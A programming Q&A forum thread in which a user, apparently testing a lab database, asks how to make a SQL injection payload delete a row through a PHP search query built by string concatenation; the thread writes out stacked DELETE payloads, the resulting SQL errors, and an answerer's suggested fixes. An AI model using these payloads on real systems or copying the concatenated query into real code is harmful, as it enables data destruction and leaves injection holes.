# How do I make SQL injection is this vulnerable query

Tags: mysql, sql, sql-injection

I have this query that receives a parameter from user input and I think that I am vulnerable to SQL injection.

```
$query = "SELECT pcode,price,description
FROM products 
WHERE description like '%" . $search_criteria . "%' ORDER BY PRICE ";
```

To test it to see if the if it's really vulnerable I am trying to send the following input

```
%';DELETE FROM products WHERE cid=18;#
```

so that the delete instruction is runned but the resultant query from this input is the following.

```
pcode,price,description FROM products WHERE description like '%%';DELETE FROM products WHERE cid=18#' %' ORDER BY PRICE
```

Although my testing parameter appears the in result SQL, the rest of the SQL ( "%' ORDER BY PRICE) wasn't ignored by the #.

What adjustments do I need to make so that my input deletes the testing row?

### Output

```
SQL Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DELETE FROM products WHERE cid=17;-- %' ORDER BY PRICE' at line 1
SQL Statement:SELECT pcode,price,description FROM products WHERE description like '%%';DELETE FROM products WHERE cid=17;-- %' ORDER BY PRICE
Did you run setupreset.php to setup/reset the DB?
```

### How the backend executes the query

```
$query = "SELECT pcode,price,description FROM products WHERE description like '%" . $search_criteria . "%' ORDER BY PRICE ";
$result = execute_query($query);
```

Answer (score 0):

which target DBMS are you trying to hack?
Basically you can use below condition as a try:

```
%';DELETE FROM products WHERE cid=18;--'
```

see the script: https://www.db-fiddle.com/f/3jC8PGeZZEuty3XVq8gdzz/1

Comment: Mysql 5.5.31 . I tried that input but got an error. I updated my question with the error

Comment: also added the code that executes the query

Comment: I just added an ending ' in the answer, could you help try it?

Comment: didn't worked either. If I execute it directly in MySQL it works, but I think that the code to execute queries is ignoring the comment markdown

Comment: Do you mean you execute the concated sql in MySQL console, it can work. But in your PHP script, it can't work? 
SQL:   `select  pcode,price,description FROM products WHERE description like '%%';DELETE FROM products WHERE cid=18 --' %' ORDER BY PRICE`

For my understanding, they should be the same.
Once you get the hacked SQL, you should be able to run it in PHP script.

Comment: that's why I think it's strange

Comment: Maybe you need use multi_query instead of common query? 
https://www.php.net/manual/de/mysqli.multi-query.php#:~:text=Executes%20one%20or%20multiple%20queries%20which%20are%20concatenated,then%20process%20the%20next%20query%20in%20the%20sequence.
I just guess that's PHP related.

Comment: I added the MySQL tag - please ensure you use this tag in future.